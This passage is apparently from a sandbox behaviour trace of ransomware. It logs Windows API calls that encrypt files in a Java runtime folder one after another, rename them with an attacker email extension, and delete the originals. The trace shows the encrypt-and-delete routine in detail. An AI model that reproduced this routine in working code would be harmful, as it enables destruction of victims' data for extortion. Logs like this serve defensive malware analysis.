returned 1 [0151.476] CloseHandle (hObject=0x2e0) returned 1 [0151.476] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll")) returned 1 [0151.477] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.477] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.478] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=15936) returned 1 [0151.478] CloseHandle (hObject=0x2e0) returned 1 [0151.478] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe")) returned 0x20 [0151.478] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.478] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.479] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.479] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.479] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.479] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2db0) returned 1 [0151.479] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.479] ReadFile (in: hFile=0x2e0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x3e40, lpOverlapped=0x0) returned 1 [0151.481] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x3e50, dwBufLen=0x3e50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x3e50) returned 1 [0151.481] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x3e50, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x3e50, lpOverlapped=0x0) returned 1 [0151.482] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2eb0) returned 1 [0151.482] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.482] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x30, dwBufLen=0x30 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x30) returned 1 [0151.482] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0151.482] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xe2, lpOverlapped=0x0) returned 1 [0151.482] CryptDestroyKey (hKey=0xac2db0) returned 1 [0151.482] CloseHandle (hObject=0x2e0) returned 1 [0151.482] CloseHandle (hObject=0x2ec) returned 1 [0151.482] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe")) returned 1 [0151.483] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.483] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.484] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=174656) returned 1 [0151.484] CloseHandle (hObject=0x2ec) returned 1 [0151.484] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll")) returned 0x20 [0151.484] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.484] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.484] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.484] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.484] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.587] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac32f0) returned 1 [0151.588] CryptSetKeyParam (hKey=0xac32f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.588] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x2aa40, lpOverlapped=0x0) returned 1 [0151.600] CryptEncrypt (in: hKey=0xac32f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x2aa50, dwBufLen=0x2aa50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x2aa50) returned 1 [0151.601] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x2aa50, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x2aa50, lpOverlapped=0x0) returned 1 [0151.604] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac31b0) returned 1 [0151.604] CryptSetKeyParam (hKey=0xac31b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.604] CryptEncrypt (in: hKey=0xac31b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x30, dwBufLen=0x30 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x30) returned 1 [0151.604] CryptDestroyKey (hKey=0xac31b0) returned 1 [0151.604] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xe2, lpOverlapped=0x0) returned 1 [0151.604] CryptDestroyKey (hKey=0xac32f0) returned 1 [0151.604] CloseHandle (hObject=0x2ec) returned 1 [0151.604] CloseHandle (hObject=0x2e0) returned 1 [0151.604] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll")) returned 1 [0151.606] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.607] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=296000) returned 1 [0151.607] CloseHandle (hObject=0x2e0) returned 1 [0151.607] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll")) returned 0x20 [0151.607] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.607] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.607] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.608] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2d70) returned 1 [0151.608] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.608] ReadFile (in: hFile=0x2e0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x48440, lpOverlapped=0x0) returned 1 [0151.614] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x48450, dwBufLen=0x48450 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x48450) returned 1 [0151.615] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x48450, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x48450, lpOverlapped=0x0) returned 1 [0151.620] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2f70) returned 1 [0151.620] CryptSetKeyParam (hKey=0xac2f70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.620] CryptEncrypt (in: hKey=0xac2f70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0151.620] CryptDestroyKey (hKey=0xac2f70) returned 1 [0151.620] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0151.620] CryptDestroyKey (hKey=0xac2d70) returned 1 [0151.620] CloseHandle (hObject=0x2e0) returned 1 [0151.620] CloseHandle (hObject=0x2ec) returned 1 [0151.620] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll")) returned 1 [0151.624] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.624] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0151.740] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=112192) returned 1 [0151.741] CloseHandle (hObject=0x2dc) returned 1 [0151.741] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe")) returned 0x20 [0151.741] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0151.741] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.741] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.741] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac34b0) returned 1 [0151.741] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.741] ReadFile (in: hFile=0x2dc, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x1b640, lpOverlapped=0x0) returned 1 [0151.745] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x1b650, dwBufLen=0x1b650 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x1b650) returned 1 [0151.745] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x1b650, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x1b650, lpOverlapped=0x0) returned 1 [0151.747] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3370) returned 1 [0151.747] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.747] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0151.747] CryptDestroyKey (hKey=0xac3370) returned 1 [0151.747] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0151.747] CryptDestroyKey (hKey=0xac34b0) returned 1 [0151.747] CloseHandle (hObject=0x2dc) returned 1 [0151.748] CloseHandle (hObject=0x2ec) returned 1 [0151.748] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe")) returned 1 [0151.749] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.749] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.750] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=235584) returned 1 [0151.750] CloseHandle (hObject=0x2ec) returned 1 [0151.750] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll")) returned 0x20 [0151.750] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.750] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.750] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.750] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.750] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0151.750] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3230) returned 1 [0151.750] CryptSetKeyParam (hKey=0xac3230, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.750] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x39840, lpOverlapped=0x0) returned 1 [0151.756] CryptEncrypt (in: hKey=0xac3230, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x39850, dwBufLen=0x39850 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x39850) returned 1 [0151.756] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x39850, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x39850, lpOverlapped=0x0) returned 1 [0151.761] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac33f0) returned 1 [0151.761] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.761] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0151.761] CryptDestroyKey (hKey=0xac33f0) returned 1 [0151.761] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0151.761] CryptDestroyKey (hKey=0xac3230) returned 1 [0151.761] CloseHandle (hObject=0x2ec) returned 1 [0151.761] CloseHandle (hObject=0x2dc) returned 1 [0151.761] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll")) returned 1 [0151.763] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0151.764] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=185920) returned 1 [0151.764] CloseHandle (hObject=0x2dc) returned 1 [0151.764] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll")) returned 0x20 [0151.764] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0151.764] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.764] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.765] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3170) returned 1 [0151.765] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.765] ReadFile (in: hFile=0x2dc, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x2d640, lpOverlapped=0x0) returned 1 [0151.769] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x2d650, dwBufLen=0x2d650 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x2d650) returned 1 [0151.769] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x2d650, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x2d650, lpOverlapped=0x0) returned 1 [0151.772] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: 